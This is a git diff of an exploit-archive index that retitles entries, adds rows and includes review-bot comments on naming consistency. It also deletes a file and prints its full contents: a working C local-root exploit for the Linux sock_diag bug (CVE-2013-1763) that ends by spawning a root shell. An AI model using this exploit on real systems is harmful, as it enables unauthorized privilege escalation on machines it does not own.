diff --git a/files.csv b/files.csv
index e90226f48..505d8768a 100755
--- a/files.csv
+++ b/files.csv
@@ -1737,7 +1737,7 @@ id,file,description,date,author,platform,type,port
 2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component <= 2.0.0 - Remote Include Vulnerability",2006-07-17,Matdhule,php,webapps,0
 2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 - Remote Include Vulnerability",2006-07-17,vitux,php,webapps,0
 2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities",2006-07-17,Matdhule,php,webapps,0
-2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0
+2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - logrotate prctl() Local Root Exploit",2006-07-18,"Marco Ivaldi",linux,local,0
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
@@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@@ -8943,7 +8943,7 @@ id,file,description,date,author,platform,type,port
 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup Vulnerability",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
-9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
+9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
@@ -13833,7 +13833,7 @@ id,file,description,date,author,platform,type,port
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
-15962,platforms/solaris/local/15962.c,"Linux Kernel Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
+15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
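Review bot: The rewritten description for 15962 still labels a Solaris exploit as "Linux Kernel", which contradicts the row's own path `platforms/solaris/local/15962.c` and its platform column `solaris`; Solaris 10 runs the SunOS 5.10 kernel, not Linux, so anyone filtering this index by product will be misled. The new text is also redundant, since "Solaris 10" and "5.10" name the same release. The old title had the same flaw, but this commit rewrites the field and is the place to fix it. Suggest `"Solaris 10 (SunOS 5.10 < 138888-01) - Local Root Exploit"`, reading 138888-01 as the patch level below which the host is affected — worth confirming against the exploit's own header before committing.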
@@ -15119,7 +15119,7 @@ id,file,description,date,author,platform,type,port
 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0
 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0
 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
-17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
+17391,platforms/linux/local/17391.c,"Linux Kernel <= 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion Vulnerability (0day)",2011-06-13,jdc,php,webapps,0
@@ -18032,8 +18032,8 @@ id,file,description,date,author,platform,type,port
 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal Vulnerability",2001-03-23,"Erik Tayler",windows,remote,0
 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability",2001-03-18,lesha,unix,local,0
 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0
-20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
-20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
+20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
+20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure Vulnerability",2001-04-03,lovehacker,multiple,remote,0
 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure Vulnerability",2001-03-30,"Dixie Flatline",hp-ux,local,0
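Review bot: The two rewritten rows describe the same target set with different separators — 20720 now reads `(RH 7.0/6.2 / 2.2.14 / ...)` while its sibling 20721 reads `(RH 7.0/6.2 & 2.2.14 / ...)` — so the paired entries (1) and (2) no longer grep or sort alike, which defeats the point of normalising them in the same commit. Pick one form for both; `/` is the separator every other row in these hunks uses. For 20721 that would be `"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2)"`.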
@@ -21720,7 +21720,7 @@ id,file,description,date,author,platform,type,port
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
-24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86-64) - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
 24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
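Review bot: `Linux Kernel < 3.3.x - 3.7.x` in the new 24555 row combines a strict upper bound with a version range, so it literally reads "below 3.3" and then contradicts itself; the old title carried a plain range and that is what the `<` should become. Suggest `"Linux Kernel 3.3.x - 3.7.x (Arch Linux x86-64) - sock_diag_handlers[] Local Root"`. Separately, the 33336.txt PoC that this same commit deletes describes the underlying sock_diag bug as present in kernels 3.3-3.8, so the 3.7.x upper bound may also be worth checking against 24555.c's own header before it is baked into the index.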
@@ -22120,7 +22120,7 @@ id,file,description,date,author,platform,type,port
 24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
 25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0
 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0
-25816,platforms/php/webapps/25816.txt,"Ovidentia FX Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0
+25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0
 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0
 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0
 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0
@@ -22350,7 +22350,7 @@ id,file,description,date,author,platform,type,port
 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0
 25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation Vulnerability",2005-03-08,adrianc23@gmail.com,cgi,webapps,0
 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1)",2005-03-09,sd,linux,local,0
-25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x / <= 2.6.9 / <= 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2)",2005-03-09,alert7,linux,local,0
+25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x (RHEL4 <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2)",2005-03-09,alert7,linux,local,0
 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String Vulnerability",2005-03-10,"Luigi Auriemma",multiple,remote,0
 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0
@@ -24429,7 +24429,7 @@ id,file,description,date,author,platform,type,port
 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443
 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,metasploit,unix,remote,7443
 27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0
-27297,platforms/lin_amd64/local/27297.c,"Linux Kernel (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
+27297,platforms/lin_amd64/local/27297.c,"Linux Kernel <= 3.7.6 (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability",2006-02-23,ReZEN,php,webapps,0
 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0
 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0
@@ -25058,14 +25058,14 @@ id,file,description,date,author,platform,type,port
 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
 27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability",2006-06-02,brokejunker,php,webapps,0
-27949,platforms/php/webapps/27949.txt,"ovidentia 5.6.x/5.8 approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27950,platforms/php/webapps/27950.txt,"ovidentia 5.6.x/5.8 vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27951,platforms/php/webapps/27951.txt,"ovidentia 5.6.x/5.8 vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27952,platforms/php/webapps/27952.txt,"ovidentia 5.6.x/5.8 vacadm.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27953,platforms/php/webapps/27953.txt,"ovidentia 5.6.x/5.8 statart.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27954,platforms/php/webapps/27954.txt,"ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27955,platforms/php/webapps/27955.txt,"ovidentia 5.6.x/5.8 posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27956,platforms/php/webapps/27956.txt,"ovidentia 5.6.x/5.8 options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27952,platforms/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - vacadm.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27953,platforms/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - statart.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Include Vulnerabilities",2006-06-02,ERNE,php,webapps,0
 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
@@ -30222,7 +30222,7 @@ id,file,description,date,author,platform,type,port
 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0
-33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
+33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64)",2014-05-26,"Matthew Daley",linux,local,0
 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"RĂ©mi Denis-Courmont",linux,dos,0
 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
@@ -35484,7 +35484,7 @@ id,file,description,date,author,platform,type,port
 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
-39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
+39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
 39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
 39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0
@@ -35790,8 +35790,8 @@ id,file,description,date,author,platform,type,port
 39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload Vulnerability",2016-03-11,"Colette Chamberland",php,webapps,80
 39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,metasploit,php,remote,80
-39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
-39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
+39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
+39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0
 39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80
 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80
@@ -36013,3 +36013,6 @@ id,file,description,date,author,platform,type,port
 39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field SEH Overwrite PoC",2016-05-11,"Nipun Jaswal",windows,dos,0
 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
+39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
+39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
+39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
diff --git a/platforms/linux/local/33336.txt b/platforms/linux/local/33336.txt
deleted file mode 100755
index 8a6d85c37..000000000
--- a/platforms/linux/local/33336.txt
+++ /dev/null
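Review bot: The added row for 39809 points at `platforms/windows/local/39809..cs`, with a doubled dot before the extension; every other path in these hunks is `<id>.<ext>`, so unless the file really was committed under that odd name this index entry will not resolve to a file on disk. It should presumably be `platforms/windows/local/39809.cs`. The same row's `(x32/x64)` is also ambiguous — "x32" is the name of a Linux ABI, and "x86/x64" is the usual pairing for a Windows 32/64-bit build — but that is cosmetic next to the path.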
@@ -1,164 +0,0 @@ -/* -* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 -* bug found by Spender -* poc by SynQ -* -* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux -* using nl_table->hash.rehash_time, index 81 -* -* Fedora 18 support added -* -* 2/2013 -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); -typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); -_commit_creds commit_creds; -_prepare_kernel_cred prepare_kernel_cred; -unsigned long sock_diag_handlers, nl_table; - -int __attribute__((regparm(3))) -kernel_code() -{ - commit_creds(prepare_kernel_cred(0)); - return -1; -} - -int jump_payload_not_used(void *skb, void *nlh) -{ - asm volatile ( - "mov $kernel_code, %eax\n" - "call *%eax\n" - ); -} - -unsigned long -get_symbol(char *name) -{ - FILE *f; - unsigned long addr; - char dummy, sym[512]; - int ret = 0; - - f = fopen("/proc/kallsyms", "r"); - if (!f) { - return 0; - } - - while (ret != EOF) { - ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); - if (ret == 0) { - fscanf(f, "%s\n", sym); - continue; - } - if (!strcmp(name, sym)) { - printf("[+] resolved symbol %s to %p\n", name, (void *) addr); - fclose(f); - return addr; - } - } - fclose(f); - - return 0; -} - -int main(int argc, char*argv[]) -{ - int fd; - unsigned family; - struct { - struct nlmsghdr nlh; - struct unix_diag_req r; - } req; - char buf[8192]; - - if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ - printf("Can't create sock diag socket\n"); - return -1; - } - - memset(&req, 0, sizeof(req)); - req.nlh.nlmsg_len = sizeof(req); - req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; - req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; - req.nlh.nlmsg_seq = 123456; - - 
//req.r.sdiag_family = 89; - req.r.udiag_states = -1; - req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; - - if(argc==1){ - printf("Run: %s Fedora|Ubuntu\n",argv[0]); - return 0; - } - else if(strcmp(argv[1],"Fedora")==0){ - commit_creds = (_commit_creds) get_symbol("commit_creds"); - prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); - sock_diag_handlers = get_symbol("sock_diag_handlers"); - nl_table = get_symbol("nl_table"); - - if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ - printf("some symbols are not available!\n"); - exit(1); - } - - family = (nl_table - sock_diag_handlers) / 4; - printf("family=%d\n",family); - req.r.sdiag_family = family; - - if(family>255){ - printf("nl_table is too far!\n"); - exit(1); - } - } - else if(strcmp(argv[1],"Ubuntu")==0){ - commit_creds = (_commit_creds) 0xc106bc60; - prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0; - req.r.sdiag_family = 81; - } - - unsigned long mmap_start, mmap_size; - mmap_start = 0x10000; - mmap_size = 0x120000; - printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); - - if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, - MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { - printf("mmap fault\n"); - exit(1); - } - memset((void*)mmap_start, 0x90, mmap_size); - - char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm - unsigned long *asd = &jump[4]; - *asd = (unsigned long)kernel_code; - - memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); - - if ( send(fd, &req, sizeof(req), 0) < 0) { - printf("bad send\n"); - close(fd); - return -1; - } - - printf("uid=%d, euid=%d\n",getuid(), geteuid() ); - - if(!getuid()) - system("/bin/sh"); - -} \ No newline at end of file diff --git a/platforms/linux/local/33516.txt b/platforms/linux/local/33516.txt deleted file mode 100755 index a25c76594..000000000 
--- a/platforms/linux/local/33516.txt
+++ /dev/null
